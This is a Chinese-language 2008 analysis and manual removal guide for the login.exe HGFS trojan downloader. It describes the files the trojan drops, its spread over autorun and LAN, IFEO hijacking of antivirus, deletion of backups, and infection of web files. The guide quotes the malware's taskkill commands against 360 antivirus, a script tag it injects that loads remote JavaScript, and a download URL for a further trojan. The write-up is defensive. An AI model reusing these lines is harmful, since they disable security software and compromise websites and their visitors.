快捷導(dǎo)航

login.exe HGFS木馬下載器的手動查殺方法

更新時間：2008年05月09日 13:42:39 作者：

這是一個具有感染腳本功能和局域網(wǎng)傳播功能的木馬下載器

樣本信息：File: login.exe
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203

1.病毒初始化:創(chuàng)建互斥量HGFSMUTEX，保證系統(tǒng)內(nèi)只有一個實例在運行

2.釋放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復(fù)制到如下啟動文件夾中達(dá)到開機啟動自身的目的
C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動\login.exe
C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\login.exe
C:\Documents and Settings\Default User\「開始」菜單\程序\啟動\login.exe

3.執(zhí)行connnet.bat批處理內(nèi)的內(nèi)容

a.遍歷d~z盤復(fù)制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目錄下

b.判斷中毒機器是否處于局域網(wǎng)，如果是則利用ipc漏洞建立一個空連接，并把autorun.exe和%autorun.inf復(fù)制到機器的C$下面。

4.IFEO劫持某些殺毒軟件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不給你啟動.exe

5.試圖結(jié)束360軟件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f

6.遍歷所有磁盤刪除.gho文件

7.遍歷所有磁盤感染asp，htm，html，aspx，php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代碼

8.鏈接網(wǎng)絡(luò)下載木馬
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但鏈接已經(jīng)失效

解決方法：

1.復(fù)制如下文字到剪貼板(假設(shè)系統(tǒng)在C盤)
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復(fù)制到如下啟動文件夾中達(dá)到開機啟動自身的目的
C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動\login.exe
C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\login.exe
C:\Documents and Settings\Default User\「開始」菜單\程序\啟動\login.exe

打開Xdelbox.exe
在下面的大框中單擊右鍵點擊 “剪貼板導(dǎo)入不檢查路徑”
之后剛才復(fù)制的那個文件列表將出現(xiàn)在下面的大框中
然后再在下面的大框中單擊右鍵點擊 “立即重啟執(zhí)行刪除”
軟件會自動重啟計算機

重啟計算機以后會有兩個系統(tǒng)進(jìn)入的選擇的倒計時界面
第一個是你原來的windows系統(tǒng)
第二個是這個軟件給你設(shè)定的dos系統(tǒng)
不用你管，它會自動選擇進(jìn)入第二個系統(tǒng)
類似dos的界面滾動完畢以后病毒就被刪除了
之后他會自動重啟進(jìn)入正常模式

2.打開sreng 啟動項目注冊表
刪除所有紅色的IFEO項目

3.建議屏蔽http://17vp.cn網(wǎng)站

您可能感興趣的文章: